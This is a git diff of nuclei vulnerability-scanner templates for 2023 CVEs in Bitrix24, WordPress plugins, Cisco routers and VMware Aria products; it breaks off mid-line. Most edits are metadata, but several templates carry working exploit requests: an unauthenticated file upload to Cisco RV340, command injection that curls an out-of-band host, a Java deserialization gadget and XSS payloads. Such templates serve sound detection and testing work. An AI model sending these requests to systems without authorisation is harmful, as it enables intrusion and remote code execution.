b/nuclei-templates/CVE-2023/CVE-2023-1719.yaml @@ -9,13 +9,14 @@ info: reference: - https://starlabs.sg/advisories/23/23-1719/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1719 + - https://github.com/20142995/sectool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1719 cwe-id: CWE-665 epss-score: 0.02807 - epss-percentile: 0.89556 + epss-percentile: 0.90415 cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:* metadata: verified: true @@ -23,7 +24,7 @@ info: vendor: bitrix24 product: bitrix24 shodan-query: html:"/bitrix/" - tags: cve,cve2023,bitrix,xss + tags: cve2023,cve,bitrix,xss,bitrix24 http: - method: GET @@ -47,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb04484a460f848e68410a7d470fb6cf254b2ae3b1d9e88454dbe51f4f661dfe02204a2f5155cd0ba253a3d78e4bf73c0f04d7e1e12b07b46fd68a11bea541995f5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1730.yaml b/nuclei-templates/CVE-2023/CVE-2023-1730.yaml index 6d5f2912c7..cdb9c8fcc3 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1730.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1730.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version 3.1.5 reference: - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7 - https://wordpress.org/plugins/supportcandy/ - https://nvd.nist.gov/vuln/detail/CVE-2023-1730 + - https://github.com/tanjiti/sec_profile classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-1730 cwe-id: CWE-89 - epss-score: 0.09522 - epss-percentile: 0.94153 + epss-score: 0.05497 + epss-percentile: 0.93034 cpe: cpe:2.3:a:supportcandy:supportcandy:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +28,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: cve,cve2023,sqli,wpscan,wordpress,supportcandy,unauth + tags: cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth http: - raw: @@ -41,4 +44,4 @@ http: - 'status_code == 200' - 'contains(body, "supportcandy")' condition: and -# digest: 4a0a0047304502206aa4f0a81d24be8a215fcd7039564fbd30b4943f3f72cfc78c4902cce2446bc3022100de65c6f51e7031780455668d94a46252e88aff6e925284f882e9c411812669f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8f43200f81783f187365c589653ad29a2050ba46a41782681ecc57fbfed6942022017518deb0c7150bec65b058cc0687e118acd14f0c54396df0e503dfb9ccdf33a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1780.yaml b/nuclei-templates/CVE-2023/CVE-2023-1780.yaml index 441c3ddde7..f57c2fb70a 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1780.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1780.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-1780 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29557 + epss-percentile: 0.2903 cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: product: companion_sitemap_generator framework: wordpress publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" - tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated + tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer http: - raw: @@ -47,4 +47,4 @@ http: - 'contains(body_2, "re not allowed to view")' - 'contains(body_2, "")' condition: and -# digest: 490a0046304402206fd9d7baedb494799d49ff9f084db87fb75d78c49f3dbcb3157e37ff9ee7959202200146bd8a2fa82e97fa2c716b1d4e374b088a32914c97d3088ee63a3cd972176d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037fd184a30baa4bf9c5bead97935ec384efbce6d629f36e79fdc4a6f96c2a5d0022100fdeb0ca8f655e4f1856990096615ff0c35961dd2dea9984283364c1c0c9cc6ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1835.yaml b/nuclei-templates/CVE-2023/CVE-2023-1835.yaml index 0d89153575..074ffba78d 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1835.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1835.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Ninja Forms (3.6.22 or higher) to mitigate this vulnerability. reference: @@ -18,7 +20,7 @@ info: cve-id: CVE-2023-1835 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29531 + epss-percentile: 0.29003 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress - tags: wpscan,cve,cve2023,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss + tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms http: - raw: @@ -48,4 +50,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Ninja Forms")' condition: and -# digest: 490a00463044022065bf57c7be63f48bb60fbd02505ef95659fa4613bf50212dbdc995f26c268358022019265d4de3f3f453cdfbc8de37ea6797bcd4732fefc1bc08c39e01c1c29d5dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e5e7a1e57dcb12a58b14088fffc8b645c336e75e181bb9e86ad3afa2cd124f16022100b7094b86bf5ee74099a6da69ea87a76394fbb02765149b058c67daca7ac66a1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1880.yaml b/nuclei-templates/CVE-2023/CVE-2023-1880.yaml index 8befbd3e3c..f4b580719f 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1880.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1880.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1880 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29441 + epss-score: 0.00078 + epss-percentile: 0.3203 cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +25,7 @@ info: vendor: phpmyfaq product: phpmyfaq shodan-query: http.html:"phpmyfaq" - tags: huntr,cve,cve2023,xss,phpmyfaq + tags: cve2023,cve,huntr,xss,phpmyfaq http: - method: GET @@ -39,4 +39,4 @@ http: - 'contains(body, "phpmyfaq") && contains(body, "")' - 'contains(content_type, "text/html")' condition: and -# digest: 490a00463044022075b0e4af7153d15048caacbf35d9f00b3f597daf2ac793a49634be966e4bd35f022069ccdecca051313adffe08f7a102948bf8d242b96b20a4a81356a82ecdeafe4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b480a371ae035c47014eec72651c9396eb2f4cbb16cef0e087536bdb0401ade02203534bd6903549f0f9c3753092efb1d6cdf4adda76ba68f6fd7ab8557a659d271:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-1890.yaml b/nuclei-templates/CVE-2023/CVE-2023-1890.yaml index 414e2ff0ba..c1dba8bb95 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-1890.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-1890.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.9. reference: - https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-1890 cwe-id: CWE-79 - epss-score: 0.00184 - epss-percentile: 0.55564 + epss-score: 0.00203 + epss-percentile: 0.57653 cpe: cpe:2.3:a:pauple:tablesome:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: pauple product: tablesome framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tablesome + tags: cve2023,cve,wpscan,wp,wp-plugin,wordpress,authenticated,xss,tablesome,pauple http: - raw: @@ -47,4 +49,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "tablesome")' condition: and -# digest: 4a0a00473045022100f013326e96a290860357377b6f082d636e943a264753bd0c6fa4bc855c2166b50220123b808105be5f2d4feb5725a2b8d8051c9df39007e73fd771a92320b3e17cc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d4ea7f06a84e16fe857d3fb6c8b915ddd7c277fa55d2b0b7341954486290763502202b6315a3b0fea762b9c94cf5ce30c251a14e7b0ac555ad55dad8d54b799b841d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20073.yaml b/nuclei-templates/CVE-2023/CVE-2023-20073.yaml index c07bd7053b..53ca70e617 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20073.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20073.yaml @@ -1,23 +1,44 @@ id: CVE-2023-20073 info: - name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload and Stored XSS + name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload author: princechaddha,ritikchaddha severity: critical description: | A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. + remediation: | + Apply the latest security patches provided by Cisco to mitigate this vulnerability. reference: - https://unsafe.sh/go-173464.html - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f - https://github.com/RegularITCat/CVE-2023-20073/tree/main - https://nvd.nist.gov/vuln/detail/CVE-2023-20073 + - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-20073 + cwe-id: CWE-434 + epss-score: 0.38542 + epss-percentile: 0.97132 + cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:* metadata: verified: true + max-request: 3 + vendor: cisco + product: rv340_firmware fofa-query: app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P" - tags: cve,cve2023,xss,fileupload,cisco,unauth,routers,vpn,intrusive + tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive +variables: + html_comment: "" # Random string as HTML comment to append in response body http: - raw: + - | + GET /index.html HTTP/1.1 + Host: {{Hostname}} - | POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1 Host: {{Hostname}} @@ -31,25 +52,32 @@ http: --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="fileparam" - login.html + index.html --------------------------f6f99e26f3a45adf Content-Disposition: form-data; name="file.path" - login.html + index.html --------------------------f6f99e26f3a45adf - Content-Disposition: form-data; name="file"; filename="login.html" + Content-Disposition: form-data; name="file"; filename="index.html" Content-Type: application/octet-stream - {{randstr}} + {{index}} + {{html_comment}} --------------------------f6f99e26f3a45adf-- - - | - GET /login.html HTTP/1.1 + GET /index.html HTTP/1.1 Host: {{Hostname}} + extractors: + - type: dsl + name: index + internal: true + dsl: + - body_1 matchers: - type: word - part: body_2 + part: body_3 words: - - "{{randstr}}" + - "{{html_comment}}" +# digest: 4a0a0047304502203543e37991008a86e6d6545f9b12ce7a9569148a72e2b69c5590d5a736a674cd022100c607440c608f5ca67437751859806a3700c511f68f54f71ac8f50a63b0335fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2009.yaml b/nuclei-templates/CVE-2023/CVE-2023-2009.yaml index 403ad4de04..4783e1fe8b 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2009.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2009.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-2009 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32968 + epss-percentile: 0.3232 cpe: cpe:2.3:a:pretty_url_project:pretty_url:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +24,7 @@ info: vendor: pretty_url_project product: pretty_url framework: wordpress - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss + tags: cve2023,cve,wordpress,wpscan,wp-plugin,wp,authenticated,pretty-url,xss,pretty_url_project http: - raw: @@ -61,4 +61,4 @@ http: group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)" />' -# digest: 490a0046304402201b0f8c7f577670e9269fb4a152d18da32ae10c7a077d7419661d5dc902e1bafb022062f8ed407a91316dac7afb032ce1648008ec5ae05ea32b01170b771a3ed0378e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d6f1b11e38f9c8eefd91b79603bf5b7eb468702c923563b993e1ba8bc58a3e502203dfa0040b3fad85659dd26b3941e38eed7bd7a42b71ad9e85a926a7a37f318ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20198.yaml b/nuclei-templates/CVE-2023/CVE-2023-20198.yaml index 70b0026e39..03ce03c97c 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20198.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20198.yaml @@ -22,8 +22,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2023-20198 - epss-score: 0.89074 - epss-percentile: 0.98434 + epss-score: 0.92151 + epss-percentile: 0.98755 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: verified: true @@ -32,7 +32,7 @@ info: product: ios_xe shodan-query: http.html_hash:1076109428 note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution. - tags: cve,cve2023,kev,cisco,rce,auth-bypass + tags: cve2023,cve,kev,cisco,rce,auth-bypass variables: cmd: uname -a @@ -61,4 +61,4 @@ http: group: 1 regex: - \n(.*)\[ -# digest: 4b0a00483046022100e9f5588343376a7fe8d1afee9bee342f5d6f14b054bb48120a0983d19cc9e75b022100b7250eef78b6aefa4226d087c21c0be95d6850fe747d0d87b59a27b2a2917100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204b6c30a90e6cf37aa7916fdb2aa34c90e17498b711af7c429834fbea028f05810220647873d5d55dd1e9af9ad701d9f44d1cd41765c1ab655050cf34f6bf140499e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2023.yaml b/nuclei-templates/CVE-2023/CVE-2023-2023.yaml index 1499989328..1f3d57af08 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2023.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2023.yaml @@ -6,18 +6,22 @@ info: severity: medium description: | Custom 404 Pro before 3.7.3 is susceptible to cross-site scripting via the search parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 3.7.3 reference: - https://wpscan.com/vulnerability/8859843a-a8c2-4f7a-8372-67049d6ea317 - https://wordpress.org/plugins/custom-404-pro/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2023 + - https://github.com/GREENHAT7/pxplan + - https://github.com/thatformat/Hvv2023 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-2023 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29557 + epss-score: 0.00374 + epss-percentile: 0.722 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +29,7 @@ info: vendor: kunalnagar product: custom_404_pro framework: wordpress - tags: wpscan,cve,cve2023,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive + tags: cve2023,cve,wpscan,xss,wordpress,wp-plugin,authenticated,custom-404-pro,intrusive,kunalnagar http: - raw: @@ -47,4 +51,4 @@ http: - contains(body_2, "onanimationstart=alert(document.domain)//") - contains(body_2, "Custom 404 Pro") condition: and -# digest: 490a0046304402201f3151d15ebcfb41faa38b0894ce1209da712bd7d4e8f421e21f7fc73031f93802206fd0f4c1cbb1c66c23eed544b24c9d7d45e766922f7248d43ee2b01356371201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20864.yaml b/nuclei-templates/CVE-2023/CVE-2023-20864.yaml index d236eff926..98345d1968 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20864.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20864.yaml @@ -6,18 +6,21 @@ info: severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0007.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20864 + - https://github.com/Threekiii/CVE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 - epss-score: 0.21157 - epss-percentile: 0.95924 + epss-score: 0.29094 + epss-percentile: 0.96766 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +28,7 @@ info: vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" - tags: cve,cve2023,vmware,aria,rce,oast + tags: cve2023,cve,vmware,aria,rce,oast http: - raw: @@ -60,4 +63,4 @@ http: internal: true kval: - "X_CSRF_Token" -# digest: 490a0046304402207d503c64579aa429be5b08a30ac186fffce881458eb002833f8766626ff4f8db02206ffdbbc34229c05dca9f7d8a8629dac9789ebb20634732b27a15edd570604a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20887.yaml b/nuclei-templates/CVE-2023/CVE-2023-20887.yaml index 0a9e20d502..5c4d6d49fd 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20887.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20887.yaml @@ -7,23 +7,32 @@ info: description: | VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are vulnerable. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/ - https://github.com/sinsinology/CVE-2023-20887 - - https://www.vmware.com/security/advisories/VMSA-2023-0012.html + - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html + - https://github.com/ARPSyndicate/cvemon classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20887 - epss-score: 0.00172 + cwe-id: CWE-77 + epss-score: 0.96408 + epss-percentile: 0.99538 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 1 + vendor: vmware + product: vrealize_network_insight shodan-query: title:"VMware vRealize Network Insight" fofa-query: title="VMware vRealize Network Insight" - tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast - + tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev variables: cmd: "curl {{interactsh-url}}" @@ -48,13 +57,14 @@ http: words: - "application/x-thrift" - - type: status - status: - - 200 - - type: word part: body + negative: true words: - "Provided invalid node Id" - "Invalid nodeId" - negative: true + + - type: status + status: + - 200 +# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20888.yaml b/nuclei-templates/CVE-2023/CVE-2023-20888.yaml index 411a232b7a..861f3de03f 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20888.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20888.yaml @@ -6,14 +6,28 @@ info: severity: high description: | Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20888 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2023-20888 + cwe-id: CWE-502 + epss-score: 0.35911 + epss-percentile: 0.96766 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,vmware,aria,rce,authenticated,oast + max-request: 2 + vendor: vmware + product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" + tags: cve2023,cve,vmware,aria,rce,authenticated,oast http: - raw: @@ -24,7 +38,6 @@ http: X-Vrni-Csrf-Token: null {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} - - | POST /api/events/push-notifications HTTP/2 Host: {{Hostname}} @@ -33,7 +46,6 @@ http: {"endOffset": "{{ generate_java_gadget("dns", "http://{{interactsh-url}}", "base64") }} "} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -48,8 +60,9 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'csrfToken":"([a-z0-9A-Z/+=]+)"' internal: true + part: body +# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-20889.yaml b/nuclei-templates/CVE-2023/CVE-2023-20889.yaml index c960a8bb7f..03cddd74fc 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-20889.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-20889.yaml @@ -1,22 +1,36 @@ id: CVE-2023-20889 info: - name: VMware Aria Operations for Networks - Command Injection/Information Disclosure + name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability author: iamnoooob,rootxharsh,pdresearch severity: high description: | Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information. + remediation: | + Apply the latest security patches provided by VMware to mitigate this vulnerability. reference: + - https://www.zerodayinitiative.com/advisories/ZDI-23-842/ - https://www.vmware.com/security/advisories/VMSA-2023-0012.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20889 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-20889 + cwe-id: CWE-77 + epss-score: 0.09004 + epss-percentile: 0.94043 + cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:* metadata: verified: true - tags: cve,cve2023,vmware,aria,disclosure,authenticated - + max-request: 2 + vendor: vmware + product: vrealize_network_insight + shodan-query: title:"VMware Aria Operations" + tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: - payload: "location='http://{{interactsh-url}}'" + payload: location='http://{{interactsh-url}}' http: - raw: @@ -27,7 +41,6 @@ http: X-Vrni-Csrf-Token: null {"username":"{{username}}","password":"{{password}}","domain":"localdomain"} - - | POST /api/pdfexport HTTP/2 Host: {{Hostname}} @@ -48,7 +61,6 @@ http: ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh-- - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -58,9 +70,9 @@ http: - http - type: word - part: header + part: header_2 words: - - 'application/octet-stream' + - application/octet-stream - type: status status: @@ -69,8 +81,9 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - - 'csrfToken":"([a-z0-9A-Z/+=]+)"' + - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true + part: body +# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/CVE-2023-2122.yaml b/nuclei-templates/CVE-2023/CVE-2023-2122.yaml index 0cd296f0df..3ef490f294 100644 --- a/nuclei-templates/CVE-2023/CVE-2023-2122.yaml +++ b/nuclei-templates/CVE-2023/CVE-2023-2122.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-2122 cwe-id: CWE-79 epss-score: 0.00064 - epss-percentile: 0.26619 + epss-percentile: 0.26189 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -25,7 +25,7 @@ info: vendor: 10web product: image_optimizer framework: wordpress - tags: wpscan,cve,cve2023,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web http: - raw: @@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 4a0a004730450220343a75b628b5fef9712f71f06ef15b621575070106b8ce7e976fbe5008cc05f502210092424946512ea282acf12aa79206345e595a2de2598d048b2a66e80c7aab82ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 